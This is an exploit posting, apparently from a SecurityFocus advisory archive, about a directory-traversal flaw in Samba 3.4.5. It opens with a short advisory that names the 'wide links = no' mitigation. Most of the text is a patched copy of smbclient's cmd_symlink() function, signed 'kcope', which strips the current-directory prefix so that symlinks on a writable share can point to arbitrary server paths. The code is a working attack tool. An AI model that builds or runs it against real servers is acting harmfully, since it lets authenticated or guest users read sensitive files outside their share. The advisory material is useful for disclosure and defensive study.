
source: https://www.securityfocus.com/bid/38111/info
Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploits would allow an attacker to access files outside of the Samba user's root directory to obtain sensitive information and perform other attacks.
To exploit this issue, attackers require authenticated access to a writable share. Note that this issue may be exploited through a writable share accessible by guest accounts.
NOTE: The vendor stated that this issue stems from an insecure default configuration. The Samba team advises administrators to set 'wide links = no' in the '[global]' section of 'smb.conf'.
smbclient patch (exploit):
samba-3.4.5/source3/client/client.c
/****************************************************************************
 UNIX symlink.

 Patched copy of smbclient's cmd_symlink() from samba-3.4.5
 (source3/client/client.c). Compared with the stock function, kept in the
 block comment further down, the two talloc_asprintf() calls no longer
 prepend client_get_cur_dir() to the user-supplied names: the link target
 and the link name are passed on exactly as typed at the smbclient prompt,
 so the client itself no longer anchors them inside the current share
 directory. Whether such a link may be followed is then decided entirely
 by the server; the advisory quoted above recommends 'wide links = no' in
 the [global] section of smb.conf.

 Returns 0 on success, 1 on usage error or on any failed client call.
****************************************************************************/

static int cmd_symlink(void)
{
	TALLOC_CTX *ctx = talloc_tos();
	char *oldname = NULL;       /* link target (first argument) */
	char *newname = NULL;       /* link name to create (second argument) */
	char *buf = NULL;           /* raw first token from the command line */
	char *buf2 = NULL;          /* raw second token from the command line */
	char *targetname = NULL;    /* oldname as resolved by cli_resolve_path() */
	struct cli_state *targetcli; /* connection that targetname lives on */

	/* Both arguments are mandatory; print usage and bail otherwise. */
	if (!next_token_talloc(ctx, &cmd_ptr,&buf,NULL) ||
	    !next_token_talloc(ctx, &cmd_ptr,&buf2,NULL)) {
		d_printf("symlink <oldname> <newname>\n");
		return 1;
	}

	/*
	 * Modified: "%s" instead of "%s%s" with client_get_cur_dir() — the
	 * target string is used verbatim, without the current-directory prefix.
	 */
	oldname = talloc_asprintf(ctx,
		"%s", // << HERE modified
		buf);
	if (!oldname) {
		return 1;
	}

	/* Same modification for the link name. */
	newname = talloc_asprintf(ctx,
		"%s", // << HERE modified
		buf2);
	if (!newname) {
		return 1;
	}

	/* ORIGINAL SMBCLIENT SOURCE LINES TO BE MODIFIED (SEE ABOVE).
	oldname = talloc_asprintf(ctx,
		"%s%s", // < modified (see above)
		client_get_cur_dir(), // < removed (see above)
		buf);
	if (!oldname) {
		return 1;
	}
	newname = talloc_asprintf(ctx,
		"%s%s", // < modified (see above)
		client_get_cur_dir(), // < removed (see above)
		buf2);
	if (!newname) {
		return 1;
	}
	----------------------------------------------*/

	/* Resolve oldname to the connection and name it should be created against. */
	if (!cli_resolve_path(ctx, "", auth_info, cli, oldname, &targetcli, &targetname)) {
		d_printf("link %s: %s\n", oldname, cli_errstr(cli));
		return 1;
	}

	/* The symlink call is a UNIX CIFS extension; refuse if the server lacks it. */
	if (!SERVER_HAS_UNIX_CIFS(targetcli)) {
		d_printf("Server doesn't support UNIX CIFS calls.\n");
		return 1;
	}

	/* Ask the server to create newname -> targetname. */
	if (!cli_unix_symlink(targetcli, targetname, newname)) {
		d_printf("%s symlinking files (%s -> %s)\n",
			cli_errstr(targetcli), newname, targetname);
		return 1;
	}

	return 0;
}
// Cheers,
// kcope